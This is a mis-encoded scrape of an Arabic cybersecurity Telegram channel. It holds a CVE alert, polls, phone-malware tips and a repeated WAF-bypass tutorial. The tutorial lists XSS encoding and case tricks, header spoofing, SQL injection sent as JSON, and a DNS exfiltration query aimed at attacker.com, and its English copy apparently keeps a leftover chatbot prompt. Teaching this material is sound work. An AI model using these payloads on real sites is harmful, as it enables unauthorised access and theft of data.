which allows an attacker to inject and execute malicious code (malware) on the victimโs device without their knowledge.
๐จ Severity Level: Critical
---
๐ฑ Affected Devices
Bad news: ๐ข
Affects Android 11, 12, 13, and 14.
Good news: ๐
Does NOT affect Android 9 and lower.
---
โ How to Protect Yourself?
1๏ธโฃ Update to the latest security patch โ
2๏ธโฃ Use a trusted antivirus โ
3๏ธโฃ Keep Bluetooth disabled when not in use โ
---
๐ก Thanks for your support! Your engagement helps me improve the content every day. Stay safe! ๐ค
Source :
https://www.cve.org/CVERecord?id=CVE-2025-0074
https://vulert.com/vuln-db/CVE-2025-0074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074
https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304
โค2
ุชุญุจ ู
ุญุชูู ุจูุฑู ุงู : what you want tomorrow
Anonymous Poll
69%
Red team : ูุฑูู ูุงุญู
ุฑ
13%
Blue team : ูุฑูู ูุงุฒุฑู
0%
Ai : ุฐูุงุก ุงุตุทูุงุนู
19%
ููุฑุณ ุงูุฌููุฒู ู
ุฏููุน ๐๐ฅ
ุชุนุงูู ูุชููู
ุนู ู
ูุถูุน ู
ูู
ุฌุฏุง ู ุงูู
ูู ุงุฒุงู ูุนู ู bypass ูู
waf ( web application firewall )
ุชุญุฐูุฑ :
1 : ุงูููุงู ุบูุฑ ู ุณุคููู ุนู ุงู ูุนู ุฎุงุฑุฌ ูุงุทุงุฑ ุงูุชุนููู ู
2 : ู ู ููุน ูุดุฑ ุงูู ูุงู ุฏูู ุฐูุฑ ุงุณู ุงููุงู ููู ู ูุดุฑ ุงูู ุนููู ู ูููู ูุง ูู ูู ูุดุฑ ุงููุชุงุจู ุจุญุฏ ุฐุงุชูุง ุงูู ุจ ุงุฐู ู ู ุตุงุญุจ ููุงู
ููุชุฑุถ ุนูุฏูุง ุณููุงุฑูู ู ูุงุญุฏ ูุณู ู
ุญู ุงุตู ุญู ุงุตู ูุงู ูุนุฏ ูููุช ูููู ุซุบุฑู
sql injection
ุดุฑุญ ุณุฑูุน : sql injection ุฏู ุจุชุญูู
ุจุงูููุฏ ูู ุงููุงุฏ sql ุจุชุงุน ู ููุน ุนุดุงู
ุชุณุญุจ ุฏุงุชุง ุฎุงุตู
ุงูู ูู ุญู ุงุตู ูู ุง ุฌู ูุณุชุบู ุซุบุฑู ู ุนุฑูุด
ู ุนุฑูุด ูุนู ููุง exploit ุจุณุจุจ waf
ุทูุจ ุญู ุงุตู ูุนู ู ุงู ุ
ุงูุง ููููู โจ
ุงูู ุญุงุฌู : ุญู ุงุตู ูุฌุฑุจ ููุนุจ ูู
ุจุงูููุฏ ูุนู ู encode ุจุฎุชุตุงุฑ
ุทุจ ุฒู ุงู ูุง ุณุจุงูุฏุฑ ๐ค
ุฒู ุจุงูููุฏ xss
<script>alert(1)</script>
ููุณู ุจุนุฏ ู ุง ุชุนู ู encode url
%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alert
ุจุงูููุฏ ููุชูุง ุจูุดุชุบู ุนุงุฏู ููู ููุณ ูุงูู
ุทูุจ ููุฑุถ ู ุด ุงุดุชุบู ๐ค
ุชุงูู ุฎุทูู :
ุชูุงุนุจ ูู headers
ุงู ุงูุชูุงุนุจ ูู ุงูููุฏุฑ ุฏู ุ
ุดูู ุชูุงุนุจ ูู ุงูููุฏุฑ ุจุชููู ุงูู ุชุญุงูู
ุชุบูุฑ ุญู ุงูู ุฒู X-Original-URL
ุทูุจ ุงุฒุงู ๐ค
ุจุณูุทู
GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1
ุทูุจ ููุฑุถ ุงููุง ู ุด ุงุดุชุบูุช ูุนู ู ุงู ุ
ููุฌู ูู ุฎุทูู ุชุงูุชู :
ูุฌุฑุจ ูุนุฏู ู HTTP ู ู ูู ูุฎูู
TRACE
ู ูุดุชุบู ู ุนุงูุง
ู ุซุงู
HEAD /admin HTTP/1.1
ุงู
TRACE /admin HTTP/1.1
ุจุฏู get ุงู post
ุทูุจ ููุชุฑุถ ู ุด ุงุดุชุบูุช ๐ค
ููุฌู ูู ุทุฑููู ุงูุฑุงุจุนู :
ุงูุฎุทูู ุฏู ุดุจู ุงูู ูุงุชุช ูููู ุงูุช
ูุชุฌุฑุจ ุชุนุฏู ุงูู ูู ูููู ู ุซูุง xml
ู ุซุงู :
/admin.json
ุทูุจ ููุชุฑุถ ู ุด ุงุดุชุบูุช ๐๐ค
ููููู ุจุฑุฏู ูู ุฎุทูู ุฎุงู ุณู ๐
ุงูุฎุทูู ุงูุฎุงู ุณู :
ู ุฏู ุจุณูุทู ูู waf ุจูููู ู ุด ุนุงุฑู
ููุฑู ุจูู ุงูุญุฑูู ุงูุตุบูุฑู ู ู ุญุฑูู
ุงููุจูุฑ
ุจุชูุฒุฑ ูุง ุณุจุงูุฏุฑ ูุนูู waf ุทูุน ุบุจู ูุฏ
ููููู ุงูู ู ุซุงู
<script>alert(1)</script>
ุฏุง ููุฏ xss ุนุงุฏู
<Script>alert(1)</Script>
ูู ููุณ ุงูููุฏ ุจููุณ ุงูุทุฑููู
ุทูุจ ููุชุฑุถ ู ุด ุงุดุชุบูุช ๐ค
ููููู ูู ุทุฑููู ุณุงุฏุณู :
ุงูุทุฑููู ุฏู ู ู ูู ุชุชูุงุนุจ ู dns ุฎุงุต
ุจู ู ููุน
ู ุซุงู :
SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\',database()));
ุฏุง ุจุงูููุฏ ุนุงุฏู
SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);
ุจุนุฏ ุชุนุฏูู
ุทูุจ ูู ูุฌุญุช ุ
ุงุฎุฑ ุทุฑููู ู ููุง ุงูุณุงุจุนู :
ุดูู ุงุตุฏุงุฑ waf ู ุฏูุฑ ุนูู cve ูู
ู ุฌุฑุจ cve ูููู ูุญุฏ ู ุง ุชูุฏุฑ ุชุนู ู bypass
ุดูุฑุง ู ูุฑุงุฆู ุงูู ูุงู ุญุงููุช ุงููู ุฎููู ู ู ูู ุจูู ุดุฆ ๐ค
ูู ุงุฒุงู ูุนู ู bypass ูู
waf ( web application firewall )
ุชุญุฐูุฑ :
1 : ุงูููุงู ุบูุฑ ู ุณุคููู ุนู ุงู ูุนู ุฎุงุฑุฌ ูุงุทุงุฑ ุงูุชุนููู ู
2 : ู ู ููุน ูุดุฑ ุงูู ูุงู ุฏูู ุฐูุฑ ุงุณู ุงููุงู ููู ู ูุดุฑ ุงูู ุนููู ู ูููู ูุง ูู ูู ูุดุฑ ุงููุชุงุจู ุจุญุฏ ุฐุงุชูุง ุงูู ุจ ุงุฐู ู ู ุตุงุญุจ ููุงู
ููุชุฑุถ ุนูุฏูุง ุณููุงุฑูู ู ูุงุญุฏ ูุณู ู
ุญู ุงุตู ุญู ุงุตู ูุงู ูุนุฏ ูููุช ูููู ุซุบุฑู
sql injection
ุดุฑุญ ุณุฑูุน : sql injection ุฏู ุจุชุญูู
ุจุงูููุฏ ูู ุงููุงุฏ sql ุจุชุงุน ู ููุน ุนุดุงู
ุชุณุญุจ ุฏุงุชุง ุฎุงุตู
ุงูู ูู ุญู ุงุตู ูู ุง ุฌู ูุณุชุบู ุซุบุฑู ู ุนุฑูุด
ู ุนุฑูุด ูุนู ููุง exploit ุจุณุจุจ waf
ุทูุจ ุญู ุงุตู ูุนู ู ุงู ุ
ุงูุง ููููู โจ
ุงูู ุญุงุฌู : ุญู ุงุตู ูุฌุฑุจ ููุนุจ ูู
ุจุงูููุฏ ูุนู ู encode ุจุฎุชุตุงุฑ
ุทุจ ุฒู ุงู ูุง ุณุจุงูุฏุฑ ๐ค
ุฒู ุจุงูููุฏ xss
<script>alert(1)</script>
ููุณู ุจุนุฏ ู ุง ุชุนู ู encode url
%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alert
xss%3Eุจุงูููุฏ ููุชูุง ุจูุดุชุบู ุนุงุฏู ููู ููุณ ูุงูู
ุทูุจ ููุฑุถ ู ุด ุงุดุชุบู ๐ค
ุชุงูู ุฎุทูู :
ุชูุงุนุจ ูู headers
ุงู ุงูุชูุงุนุจ ูู ุงูููุฏุฑ ุฏู ุ
ุดูู ุชูุงุนุจ ูู ุงูููุฏุฑ ุจุชููู ุงูู ุชุญุงูู
ุชุบูุฑ ุญู ุงูู ุฒู X-Original-URL
ุทูุจ ุงุฒุงู ๐ค
ุจุณูุทู
GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1
ุทูุจ ููุฑุถ ุงููุง ู ุด ุงุดุชุบูุช ูุนู ู ุงู ุ
ููุฌู ูู ุฎุทูู ุชุงูุชู :
ูุฌุฑุจ ูุนุฏู ู HTTP ู ู ูู ูุฎูู
TRACE
ู ูุดุชุบู ู ุนุงูุง
ู ุซุงู
HEAD /admin HTTP/1.1
ุงู
TRACE /admin HTTP/1.1
ุจุฏู get ุงู post
ุทูุจ ููุชุฑุถ ู ุด ุงุดุชุบูุช ๐ค
ููุฌู ูู ุทุฑููู ุงูุฑุงุจุนู :
ุงูุฎุทูู ุฏู ุดุจู ุงูู ูุงุชุช ูููู ุงูุช
ูุชุฌุฑุจ ุชุนุฏู ุงูู ูู ูููู ู ุซูุง xml
ู ุซุงู :
/admin.json
ุทูุจ ููุชุฑุถ ู ุด ุงุดุชุบูุช ๐๐ค
ููููู ุจุฑุฏู ูู ุฎุทูู ุฎุงู ุณู ๐
ุงูุฎุทูู ุงูุฎุงู ุณู :
ู ุฏู ุจุณูุทู ูู waf ุจูููู ู ุด ุนุงุฑู
ููุฑู ุจูู ุงูุญุฑูู ุงูุตุบูุฑู ู ู ุญุฑูู
ุงููุจูุฑ
ุจุชูุฒุฑ ูุง ุณุจุงูุฏุฑ ูุนูู waf ุทูุน ุบุจู ูุฏ
ููููู ุงูู ู ุซุงู
<script>alert(1)</script>
ุฏุง ููุฏ xss ุนุงุฏู
<Script>alert(1)</Script>
ูู ููุณ ุงูููุฏ ุจููุณ ุงูุทุฑููู
ุทูุจ ููุชุฑุถ ู ุด ุงุดุชุบูุช ๐ค
ููููู ูู ุทุฑููู ุณุงุฏุณู :
ุงูุทุฑููู ุฏู ู ู ูู ุชุชูุงุนุจ ู dns ุฎุงุต
ุจู ู ููุน
ู ุซุงู :
SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\',database()));
ุฏุง ุจุงูููุฏ ุนุงุฏู
SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);
ุจุนุฏ ุชุนุฏูู
ุทูุจ ูู ูุฌุญุช ุ
ุงุฎุฑ ุทุฑููู ู ููุง ุงูุณุงุจุนู :
ุดูู ุงุตุฏุงุฑ waf ู ุฏูุฑ ุนูู cve ูู
ู ุฌุฑุจ cve ูููู ูุญุฏ ู ุง ุชูุฏุฑ ุชุนู ู bypass
ุดูุฑุง ู ูุฑุงุฆู ุงูู ูุงู ุญุงููุช ุงููู ุฎููู ู ู ูู ุจูู ุดุฆ ๐ค
โค1
Bypassing WAF (Web Application Firewall): A Practical Guide
Disclaimer:
1. This article is for educational purposes only. The author is not responsible for any misuse of the information provided.
2. You may share the knowledge but do not copy this article without permission from the author.
---
Introduction
Let's imagine a scenario where a hacker, whom weโll call Hamasah, discovers a SQL Injection vulnerability on a target website.
Quick Explanation:
SQL Injection allows attackers to inject malicious SQL queries into an applicationโs database to extract sensitive information.
However, when Hamasah attempts to exploit the vulnerability, the attack gets blocked by a WAF (Web Application Firewall).
So, what should Hamasah do? ๐ค
Let's explore different WAF bypass techniques step by step.
---
1. Encoding the Payload
One of the simplest ways to bypass a WAF is by encoding the payload so that it doesn't match the WAFโs predefined signatures.
Example: XSS Encoding
Original Payload:
<script>alert(1)</script>
Encoded Payload (URL Encoding):
%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alertxss%3E
In this case, the WAF might fail to detect the encoded payload while the browser will still interpret and execute it normally.
---
2. Header Manipulation
Some WAFs rely on analyzing request headers to detect malicious traffic. Modifying headers can help bypass them.
Example: Spoofing X-Forwarded-For
Some WAFs only block specific IPs. You can try bypassing it by adding a X-Forwarded-For header to appear as a trusted source.
GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1
If the WAF is improperly configured, it might think the request is coming from the localhost and allow it through.
---
3. HTTP Method Manipulation
Instead of using standard HTTP methods like GET or POST, trying other methods such as HEAD or TRACE might work.
Example:
HEAD /admin HTTP/1.1
or
TRACE /admin HTTP/1.1
Some WAFs do not inspect these methods as strictly as GET/POST.
---
4. Switching to Alternative Data Formats
If the WAF filters traditional form-based requests, try sending data in JSON or XML format instead.
Example:
Instead of:
username=admin' OR 1=1 --
Try sending it as JSON:
{ "username": "admin' OR 1=1 --", "password": "password" }
Some WAFs are not designed to analyze JSON requests properly, which can allow the payload to bypass security.
---
5. Case Manipulation
Many WAFs perform case-sensitive filtering, so modifying the letter case can sometimes bypass them.
Example: XSS Attack Case Manipulation
Normal Payload:
<script>alert(1)</script>
Bypass Attempt:
<Script>alert(1)</Script>
If the WAF only blocks lowercase "script", the uppercase version might go through.
---
6. Exploiting DNS-based Exfiltration
Some WAFs block direct responses but still allow outbound connections, which can be used to extract data.
Example:
Instead of trying to display sensitive data on the screen, you can send it to an external server via DNS requests:
SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\', database()));
or
SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);
If the WAF does not filter outbound traffic, the database information might be leaked via DNS requests.
---
7. Finding WAF Vulnerabilities (CVE Exploits)
The ultimate method for bypassing a WAF is to find vulnerabilities in the WAF itself.
Steps:
1. Identify the WAF using tools like WAFW00F:
wafw00f http://target.com
2. Search for CVEs related to that WAF.
3. Exploit known vulnerabilities to bypass or disable the WAF.
For example, if the target is using an outdated version of a cloud-based WAF, you might find a known CVE that allows bypassing its protection.
---
Conclusion
WAF bypassing is an ongoing challenge that requires creativity and persistence. Combining multiple techniques often yields the best results.
If one method doesn't work, try another approachโbecause thereโs always a way!
Would you like me to help you turn this into a video script or add more advanced techniques?
Disclaimer:
1. This article is for educational purposes only. The author is not responsible for any misuse of the information provided.
2. You may share the knowledge but do not copy this article without permission from the author.
---
Introduction
Let's imagine a scenario where a hacker, whom weโll call Hamasah, discovers a SQL Injection vulnerability on a target website.
Quick Explanation:
SQL Injection allows attackers to inject malicious SQL queries into an applicationโs database to extract sensitive information.
However, when Hamasah attempts to exploit the vulnerability, the attack gets blocked by a WAF (Web Application Firewall).
So, what should Hamasah do? ๐ค
Let's explore different WAF bypass techniques step by step.
---
1. Encoding the Payload
One of the simplest ways to bypass a WAF is by encoding the payload so that it doesn't match the WAFโs predefined signatures.
Example: XSS Encoding
Original Payload:
<script>alert(1)</script>
Encoded Payload (URL Encoding):
%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alertxss%3E
In this case, the WAF might fail to detect the encoded payload while the browser will still interpret and execute it normally.
---
2. Header Manipulation
Some WAFs rely on analyzing request headers to detect malicious traffic. Modifying headers can help bypass them.
Example: Spoofing X-Forwarded-For
Some WAFs only block specific IPs. You can try bypassing it by adding a X-Forwarded-For header to appear as a trusted source.
GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1
If the WAF is improperly configured, it might think the request is coming from the localhost and allow it through.
---
3. HTTP Method Manipulation
Instead of using standard HTTP methods like GET or POST, trying other methods such as HEAD or TRACE might work.
Example:
HEAD /admin HTTP/1.1
or
TRACE /admin HTTP/1.1
Some WAFs do not inspect these methods as strictly as GET/POST.
---
4. Switching to Alternative Data Formats
If the WAF filters traditional form-based requests, try sending data in JSON or XML format instead.
Example:
Instead of:
username=admin' OR 1=1 --
Try sending it as JSON:
{ "username": "admin' OR 1=1 --", "password": "password" }
Some WAFs are not designed to analyze JSON requests properly, which can allow the payload to bypass security.
---
5. Case Manipulation
Many WAFs perform case-sensitive filtering, so modifying the letter case can sometimes bypass them.
Example: XSS Attack Case Manipulation
Normal Payload:
<script>alert(1)</script>
Bypass Attempt:
<Script>alert(1)</Script>
If the WAF only blocks lowercase "script", the uppercase version might go through.
---
6. Exploiting DNS-based Exfiltration
Some WAFs block direct responses but still allow outbound connections, which can be used to extract data.
Example:
Instead of trying to display sensitive data on the screen, you can send it to an external server via DNS requests:
SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\', database()));
or
SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);
If the WAF does not filter outbound traffic, the database information might be leaked via DNS requests.
---
7. Finding WAF Vulnerabilities (CVE Exploits)
The ultimate method for bypassing a WAF is to find vulnerabilities in the WAF itself.
Steps:
1. Identify the WAF using tools like WAFW00F:
wafw00f http://target.com
2. Search for CVEs related to that WAF.
3. Exploit known vulnerabilities to bypass or disable the WAF.
For example, if the target is using an outdated version of a cloud-based WAF, you might find a known CVE that allows bypassing its protection.
---
Conclusion
WAF bypassing is an ongoing challenge that requires creativity and persistence. Combining multiple techniques often yields the best results.
If one method doesn't work, try another approachโbecause thereโs always a way!
Would you like me to help you turn this into a video script or add more advanced techniques?
โค1
ุชุญุจ ู
ุญุชูู ุจูุฑู ูููู ุงู : What do you want the content to be
Anonymous Poll
63%
Red team : ูุฑูู ุงููุฌูู
17%
Blue team : ูุฑูู ุงูุฏูุงุน
20%
Ai : ุฐูุงุก ุงุตุทูุงุนู
โค3
ุงุฒุงู ุงุนุฑู ุงูู ู
ุฎุชุฑู
ุบุงูุจูุง ุงููุงุชู ุจูุนูู ูุฃู ุจุนุถ ุงูุชุทุจููุงุช ุจุชุณุชููู ูู ูุฉ ูุจูุฑุฉ ู ู ุงูุฅูุชุฑูุช. ูุญู ุงูู ุดููุฉ ุฏูุ ููุณุชุญุณู ุชุญู ูู ุชุทุจูู ุฒู GlassWire ุนูุดุงู ุชุฑุงูุจ ุงุณุชููุงู ุงูุจูุงูุงุช. ูู ูุงุญุธุช ุฅู ูู ุชุทุจูู ุจูุณุชููู ุจูุงูุงุช ุจุดูู ุบูุฑ ุทุจูุนู ู ู ุบูุฑ ุณุจุจ ูุงุถุญุ ุฏู ู ู ูู ูููู ุจุณุจุจ ุจุฑูุงู ุฌ ุถุงุฑ ุจูุฑุชุจุท ุจุงูุฅูุชุฑูุช.
ูู ูููุช ุชุทุจูู ุบุฑูุจุ ุงุฏุฎู ุนูู ุฅุนุฏุงุฏุงุช ุงููุงุชู ุนูุดุงู ุชุฏูุฑ ุนููู. ูููุ ูุฃู ุจุนุถ ุงูุจุฑุงู ุฌ ุงูุถุงุฑุฉ ุจุชููู ู ุฎููุฉุ ุฒู ู ุง ู ู ูู ุชูุงูู ุชุทุจูู ู ุงููุด ุงุณู ุฃู ุตูุฑุฉ. ูู ุงูุญุงูุฉ ุฏูุ ูุงุฒู ุชู ุณุญู
ุจุนุถ ุงูุชุทุจููุงุช ู ุด ุฏุงูู ูุง ู ุตู ู ุฉ ุนูุดุงู ุชุณุฑู ู ููุงุชูุ ููููุง ู ู ูู ุชุนุฑุถ ุฅุนูุงูุงุช ุจุดูู ู ูุฑุทุ ุญุชู ูุงูุช ู ุด ูุงุชุญ ุงูุชุทุจูู. ุงููุฏู ู ู ุงูุฅุนูุงูุงุช ุฏู ุบุงูุจูุง ุจูููู ุงูุฑุจุญ ุงูู ุงุฏู. ูู ุจุฏุฃุช ุชูุงูู ุฅุนูุงูุงุช ุนุดูุงุฆูุฉ ูู ูุงุฌูุฉ ุงููุงุชู ู ู ุบูุฑ ุณุจุจุ ุฏู ุนูุงู ุฉ ูุงุถุญุฉ ุฅู ูู ุจุฑูุงู ุฌ ุถุงุฑ ุนูู ุฌูุงุฒู.
https://t.me/SpiderCodeCommunity1
ูุชุงุจู : @Gg22rf โค๏ธ
ุบุงูุจูุง ุงููุงุชู ุจูุนูู ูุฃู ุจุนุถ ุงูุชุทุจููุงุช ุจุชุณุชููู ูู ูุฉ ูุจูุฑุฉ ู ู ุงูุฅูุชุฑูุช. ูุญู ุงูู ุดููุฉ ุฏูุ ููุณุชุญุณู ุชุญู ูู ุชุทุจูู ุฒู GlassWire ุนูุดุงู ุชุฑุงูุจ ุงุณุชููุงู ุงูุจูุงูุงุช. ูู ูุงุญุธุช ุฅู ูู ุชุทุจูู ุจูุณุชููู ุจูุงูุงุช ุจุดูู ุบูุฑ ุทุจูุนู ู ู ุบูุฑ ุณุจุจ ูุงุถุญุ ุฏู ู ู ูู ูููู ุจุณุจุจ ุจุฑูุงู ุฌ ุถุงุฑ ุจูุฑุชุจุท ุจุงูุฅูุชุฑูุช.
ูู ูููุช ุชุทุจูู ุบุฑูุจุ ุงุฏุฎู ุนูู ุฅุนุฏุงุฏุงุช ุงููุงุชู ุนูุดุงู ุชุฏูุฑ ุนููู. ูููุ ูุฃู ุจุนุถ ุงูุจุฑุงู ุฌ ุงูุถุงุฑุฉ ุจุชููู ู ุฎููุฉุ ุฒู ู ุง ู ู ูู ุชูุงูู ุชุทุจูู ู ุงููุด ุงุณู ุฃู ุตูุฑุฉ. ูู ุงูุญุงูุฉ ุฏูุ ูุงุฒู ุชู ุณุญู
ุจุนุถ ุงูุชุทุจููุงุช ู ุด ุฏุงูู ูุง ู ุตู ู ุฉ ุนูุดุงู ุชุณุฑู ู ููุงุชูุ ููููุง ู ู ูู ุชุนุฑุถ ุฅุนูุงูุงุช ุจุดูู ู ูุฑุทุ ุญุชู ูุงูุช ู ุด ูุงุชุญ ุงูุชุทุจูู. ุงููุฏู ู ู ุงูุฅุนูุงูุงุช ุฏู ุบุงูุจูุง ุจูููู ุงูุฑุจุญ ุงูู ุงุฏู. ูู ุจุฏุฃุช ุชูุงูู ุฅุนูุงูุงุช ุนุดูุงุฆูุฉ ูู ูุงุฌูุฉ ุงููุงุชู ู ู ุบูุฑ ุณุจุจุ ุฏู ุนูุงู ุฉ ูุงุถุญุฉ ุฅู ูู ุจุฑูุงู ุฌ ุถุงุฑ ุนูู ุฌูุงุฒู.
https://t.me/SpiderCodeCommunity1
ูุชุงุจู : @Gg22rf โค๏ธ
Telegram
SPIDER1CODE
Spider1Code is the first Arab community that brings together cybersecurity artificial intelligence, and more โจ๐ค
๐2
ุงููููู
ููู ูุฃูู ุบุฒุฉ ุนูููุง ููุตูุฑูุงุ ูุจุฏูู ุฎูููู
ุฃู
ููุง.
ุงููููู ุงุฌุนู ูุฃูู ุบุฒุฉ ุงููุตุฑุฉ ูุงูุนุฒุฉ ูุงูุบูุจุฉ ูุงูููุฉ ูุงูููุจุฉ.
ุชุนุฒ ุนูููุง ุบุฒุฉ ..ูุนุฒ ุนูููุง ุนุฒุงุคูุง.. ุงููููู ุบุฒุฉ ุญุชู ุชุทู ุฆู.
ุงููููู ุฅูู ุบุฒุฉ ูู ุญูู ุงู ูุง ุญูู ู ููุง ุณููุงู.
ุงููููู ูุณุฃูู ููุญุฉ ู ู ููุญุงุช ุฑุญู ุชูู ุชูู ุงูุชู ูุง ุชูุจูู ุจุคุณูุง ุ ููุง ุญุฒููุง ุ ููุง ุถูููุง ุ ููุง ูุฃุณูุง ุฃุชุช ุนููู ุฅูุง ุฌุนูุชู ูุฑุฌูุง ููุฑุญูุง ูุง ุงููู ... ูุงุฑุจ ุจู ุชุทูุจู ุงูุฎูุงุทุฑ ูู ู ุนูุฏู ุชุชุญููู ุงูุฃู ููุงุช ุงุณุชูุฏุนูุงู ุดูุฆุงู ูู ุฎูุงุทุฑูุง ุ ูุญููู ููุง ูุง ุฑุจ ุงูุนุงูู ูู.
ุงููููู ุงุฌุนู ูุฃูู ุบุฒุฉ ุงููุตุฑุฉ ูุงูุนุฒุฉ ูุงูุบูุจุฉ ูุงูููุฉ ูุงูููุจุฉ.
ุชุนุฒ ุนูููุง ุบุฒุฉ ..ูุนุฒ ุนูููุง ุนุฒุงุคูุง.. ุงููููู ุบุฒุฉ ุญุชู ุชุทู ุฆู.
ุงููููู ุฅูู ุบุฒุฉ ูู ุญูู ุงู ูุง ุญูู ู ููุง ุณููุงู.
ุงููููู ูุณุฃูู ููุญุฉ ู ู ููุญุงุช ุฑุญู ุชูู ุชูู ุงูุชู ูุง ุชูุจูู ุจุคุณูุง ุ ููุง ุญุฒููุง ุ ููุง ุถูููุง ุ ููุง ูุฃุณูุง ุฃุชุช ุนููู ุฅูุง ุฌุนูุชู ูุฑุฌูุง ููุฑุญูุง ูุง ุงููู ... ูุงุฑุจ ุจู ุชุทูุจู ุงูุฎูุงุทุฑ ูู ู ุนูุฏู ุชุชุญููู ุงูุฃู ููุงุช ุงุณุชูุฏุนูุงู ุดูุฆุงู ูู ุฎูุงุทุฑูุง ุ ูุญููู ููุง ูุง ุฑุจ ุงูุนุงูู ูู.
๐3
Forwarded from SPIDER SECURITY
ุจูุฑู ุงูู ููู
ู
ู ูููู ุงููุฏุฑ ูููู ุงููุฏุฑ ู
ู
ูู ุชููู ู
ู ุงุฎุฑ ุนุดุฑ ุชูุงู
๐๐ป
โค3
ุนุดุงู ุจุตุฑุงุญู ู
ุญุชุงุฑ ุงูุฒู ุงู
Anonymous Poll
13%
CVE
33%
Roadmap
54%
Bug bounty tools for web